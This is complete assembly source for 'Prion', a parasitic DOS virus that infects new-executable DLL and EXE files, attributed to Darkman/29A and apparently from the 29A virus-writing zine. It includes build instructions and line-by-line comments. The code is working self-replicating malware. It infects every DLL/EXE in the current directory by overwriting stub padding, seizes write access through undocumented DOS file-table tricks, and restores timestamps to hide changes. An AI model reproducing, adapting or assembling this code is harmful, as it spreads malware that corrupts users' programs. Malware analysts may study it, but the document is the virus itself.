
29A Issue 02 05 13


comment *
Prion ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Code by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ

Prion is a 313-byte parasitic, direct-action virus for new-executable DLL/EXE
files. When executed it infects every file in the current directory: it scans
the file's DOS stub for an INT 21h followed by a run of identical bytes at least
as long as the virus, and overwrites that area with the virus body. Prion
installs its own critical-error (INT 24h) handler.

I would like to thank Grog for the idea to this virus and Heuristic/29A for
helping me finish it.

To compile Prion with Turbo Assembler v 4.0 type:
TASM /M PRION.ASM
TLINK /x PRION.OBJ
EXE2BIN PRION.EXE PRION.COM
*

.model tiny
.code

; Entry point. The virus body runs from inside a host's DOS (MZ) stub at an
; unknown offset, so it first computes its own load address (the "delta
; offset") with a call/pop pair and addresses all of its data via BP.
code_begin:
call delta_offset
delta_offset:
pop bp ; BP = run-time address of delta_offset
sub bp,(offset delta_offset-code_begin) ; BP = run-time address of code_begin (delta offset)

; Switch to a private stack: SS = CS, SP = the virus's own start address
; rounded down to an even address. Interrupts are masked until SS:SP is
; consistent again.
; NOTE(review): the stack therefore grows downward from the virus's first
; byte, i.e. into whatever the host keeps in memory just below the image.
cli ; Clear interrupt-enable flag
push cs ; Save CS at stack
pop ss ; Load SS from stack (CS)

mov sp,bp ; SP = delta offset
and sp,1111111111111110b ; word-align SP (clear bit 0)
sti ; Set interrupt-enable flag

push ax ; Keep the host's AX; it is the only register restored before the host's INT 21h is re-issued (see find_next)

push cs ; DS = CS so that every [bp+...] data reference below goes through DS
pop ds ; Load DS from stack (CS)

mov ax,2524h ; INT 21h/25h: point interrupt vector 24h (critical error) ...
lea dx,[bp+int24_virus] ; ... at int24_virus, which fails the DOS call instead of prompting
int 21h ; NOTE(review): the previous vector is never read or restored

mov ah,1ah ; INT 21h/1Ah: set disk transfer address ...
lea dx,[bp+dta] ; ... to the virus's own dta buffer, which lies past code_end
int 21h

mov ah,4eh ; INT 21h/4Eh: find first file matching file_specifi ("*.*")
mov cl,00100111b ; CL = attribute mask 27h (bits 0,1,2,5 - presumably read-only/hidden/system/archive); NOTE(review): CH is left as the host had it
lea dx,[bp+file_specifi] ; DX = offset of file_specifi
find_next:
int 21h ; AH = 4Eh on the first pass, 4Fh (find next) afterwards; CF set when no more files
jnc infect_file ; No error? Jump to infect_file

; No more files: hand control back to the host. The AX saved at entry is
; restored and INT 21h executed - that is the DOS call whose opcode the virus
; overwrote in the stub (see test_opcode). Only AX is restored; DS, SS:SP and
; the other registers stay as the virus left them, so this presumably relies
; on the replaced call being one that needs nothing but AX (e.g. a terminate).
pop ax ; Load AX from stack
int 21h
infect_file:
mov ax,3d00h ; INT 21h/3Dh: open the found file read-only
lea dx,[bp+filename] ; DX = offset of filename (filled in by DOS inside the DTA)
int 21h
xchg ax,bx ; BX = file handle (xchg does not touch CF)
jc close_file ; Error? Jump to close_file (which will then close whatever BX holds)

; Undocumented DOS internals: walk from the handle to its System File Table
; (SFT) entry so the file can be manipulated without further INT 21h calls.
mov ax,1220h ; INT 2Fh/1220h: ES:DI = job file table entry for handle BX
int 2fh

push bx ; Save BX at stack
mov ax,1216h ; INT 2Fh/1216h: ES:DI = address of SFT entry number BL
mov bl,es:[di] ; BL = SFT number read from the job file table entry
int 2fh
pop bx ; Load BX from stack

mov byte ptr es:[di+02h],02h ; NOTE(review): writes 02h into the SFT entry at +02h - presumably the open-mode field, turning the read-only handle into read/write; confirm against the DOS SFT layout

mov ax,es:[di+28h] ; AX = first two characters of the extension (SFT holds the FCB-style name)
mov cl,es:[di+2ah] ; CL = third character of the extension

cmp ax,'LD' ; first two extension characters "DL"?
jne test_exe ; Not equal? Jump to test_exe
cmp cl,'L' ; "DLL" extension?
je read_header ; Equal? Jump to read_header
test_exe:
cmp ax,'XE' ; first two extension characters "EX"?
jne close_file ; Not equal? Jump to close_file
cmp cl,'E' ; "EXE" extension?
jne close_file ; Not equal? Jump to close_file
read_header:
mov ah,3fh ; INT 21h/3Fh: read from file ...
mov cx,40h ; ... sixty-four bytes (the MZ header); CL stays 40h and is reused at test_new_exe
lea dx,[bp+file_header] ; DX = offset of file_header
int 21h ; NOTE(review): neither CF nor the byte count in AX is checked

mov si,dx ; SI = offset of file_header
mov ax,[si] ; AX = EXE signature

; Accept the signature in either byte order ("MZ" or "ZM").
xor ax,'MZ' ; zero for one byte order ...
jz test_new_exe ; Zero? Jump to test_new_exe
xor ax,('ZM' xor 'MZ') ; ... and, undoing the first xor, zero for the other
jnz close_file ; Not zero? Jump to close_file
test_new_exe:
cmp [si+18h],cl ; MZ header word at +18h >= 40h (CL)? then a new-executable header offset is present at +3Ch
jae test_stack ; Above or equal? Jump to test_stack
close_file:
mov ah,3eh ; INT 21h/3Eh: close handle BX
int 21h

mov ah,4fh ; INT 21h/4Fh: find next matching file (continues from the DTA)
jmp find_next
test_stack:
; Linear address of the stub's initial stack: SS*16 + SP (MZ header +0Eh/+10h).
mov ax,10h ; Multiply initial SS relative to ...
mul word ptr [si+0eh] ; DX:AX = initial SS * 16
add ax,[si+10h] ; DX:AX += initial SP
adc dx,00h ; " " " " " "
jnz test_stack_ ; high word non-zero? Jump to test_stack_

or ax,ax ; SS:SP = 0:0, i.e. no stack at all?
jz calc_header ; Zero? Jump to calc_header
test_stack_:
; Reject the file when the stub's stack lies below the new-executable header
; offset (+3Ch low word, +3Eh high word).
; NOTE(review): the low word is compared before the high word, so this is not
; a true 32-bit compare; it can only over-reject, never under-reject.
cmp ax,[si+3ch] ; Stack placed in new executable ...?
jb close_file ; Below? Jump to close_file
cmp dx,[si+3eh] ; Stack placed in new executable ...?
jb close_file ; Below? Jump to close_file
calc_header:
mov ax,10h ; Multiply header size in paragraphs ...
mul word ptr [si+08h] ; DX:AX = header size in bytes (MZ header +08h)

; Seek by writing the SFT file-position field (+15h low, +17h high) directly
; instead of using INT 21h/42h: position = end of MZ header = start of the stub.
mov es:[di+15h],ax ; Move file pointer to end of header
mov es:[di+17h],dx ; " " " " " " "

sub ax,[si+3ch] ; DX:AX = header size - new-executable header offset
sbb dx,[si+3eh] ; " " " " " " "

; Require the high word to be exactly 0FFFFh: the difference is negative and
; the stub is shorter than 64K. AX is then -(stub size) as a 16-bit value.
neg dx ; Negate DX
dec dx ; Decrease DX
jnz close_file ; Not zero? Jump to close_file

lea dx,[bp+file_buffer] ; DX = offset of file_buffer (also the destination of the read below)
cmp ax,dx ; unsigned: 10000h - stubsize <= offset of file_buffer means the stub would not fit in the segment
jbe close_file ; Below or equal? Jump to close_file; NOTE(review): the bound ignores BP, so it is only exact when the virus sits at offset 0

neg ax ; AX = stub size in bytes
push ax ; Save the stub size; popped on both exits of the scan below
xchg cx,ax ; CX = bytes to read from file

mov ah,3fh ; INT 21h/3Fh: read the whole stub into file_buffer
int 21h ; NOTE(review): CF and the byte count are not checked

; Scan the stub backwards from its last byte, counting how many trailing
; bytes are identical to that last byte.
std ; Set direction flag: lodsb now decrements SI
dec cx ; CX = stub size - 1
mov si,dx ; SI = offset of file_buffer
add si,cx ; SI = offset of the last stub byte
lodsb ; AL = last byte of the stub (the reference value)
xchg ax,dx ; DL = reference byte
search_const:
lodsb ; AL = next byte towards the start of the stub
cmp al,dl ; Still equal to the reference byte?
jne test_opcode ; Not equal? Jump to test_opcode

loop search_const

; The whole stub is one constant byte: nothing to anchor on, give up.
pop ax ; Load AX from stack (discard the saved stub size)
close_file_:
jmp close_file
test_opcode:
pop ax ; AX = stub size

; The constant run must be immediately preceded by INT 21h (bytes 0CDh,21h).
; lodsb already decremented SI, so SI points one byte below the first
; differing byte: the word at [si] must be 0CDh,21h - the differing byte is
; the 21h of the INT 21h.
cmp [si],0010000111001101b ; = 21CDh, i.e. bytes 0CDh,21h in memory
jne close_file ; INT 21h (opcode 0cdh,21h)? Jump ...

; CX = number of stub bytes before the INT 21h; AX = stubsize - CX = 2 bytes
; of INT 21h + length of the constant run = space available for the virus,
; counted back from the end of the stub.
dec cx ; Decrease CX
dec cx ; " "
sub ax,cx ; AX = offset of virus within file

mov cx,(code_end-code_begin) ; CX = virus size in bytes
cmp ax,cx ; Enough constant bytes in file?
jb close_file ; Below? Jump to close_file

; Seek back AX bytes from the current position (end of the stub) through
; the SFT position field: the virus overwrites the INT 21h and the padding
; that follows it.
sub es:[di+15h],ax ; Move file pointer to offset of v...
sbb word ptr es:[di+17h],00h

mov ah,40h ; INT 21h/40h: write CX = virus size bytes from DS:DX = the virus image
mov dx,bp ; DX = delta offset
int 21h ; NOTE(review): the write result is not checked

; Put the host's original timestamp back from the DTA so the infected file
; does not look modified.
mov ax,5701h ; INT 21h/5701h: set file's date and time
mov cx,[bp+file_time] ; CX = file's time
mov dx,[bp+file_date] ; DX = file's date
int 21h

jmp close_file_

; Critical-error (INT 24h) handler installed at entry. A critical error
; raised by any of the DOS calls above (e.g. a write-protected disk) is
; answered with AL = 3 = "fail the system call in progress", so the failing
; INT 21h returns an error to the virus instead of invoking the default
; handler's prompt.
int24_virus proc near ; Interrupt 24h of Prion
mov al,03h ; Fail system call in progress
; NOTE(review): the handler does nothing but set AL and return; the vector is
; never put back (see code_begin).
iret ; Interrupt return!
endp

file_specifi db '*.*',00h ; File specification: every file in the current directory
virus_name db '[Prion] ' ; Name of the virus (part of the image written into hosts)
virus_author db '[Darkman/29A] ' ; Author of the virus
; Everything from code_end on is not written to hosts (the write length is
; code_end-code_begin) but is used as scratch memory at run time, overlapping
; whatever the host has in memory after the virus image.
code_end:
; DTA as filled by INT 21h/4Eh-4Fh; offsets are relative to dta.
dta:
db 15h dup(?) ; +00h..+14h: reserved, used by DOS for find-next
file_attr db ? ; +15h: attribute of the found file
file_time dw ? ; +16h: file time (restored with INT 21h/5701h after infection)
file_date dw ? ; +18h: file date
filesize dd ? ; +1Ah: file size (not referenced by the code above)
filename db 0dh dup(?) ; +1Eh: ASCIIZ file name, 13 bytes, passed to INT 21h/3Dh
; file_buffer receives the entire DOS stub of the host (bounded only by the
; segment-size check before the read); just the first 40h bytes are declared,
; the rest spills past the assembled image.
file_buffer:
file_header db 40h dup(?) ; MZ header: first 64 bytes of the file

end code_begin
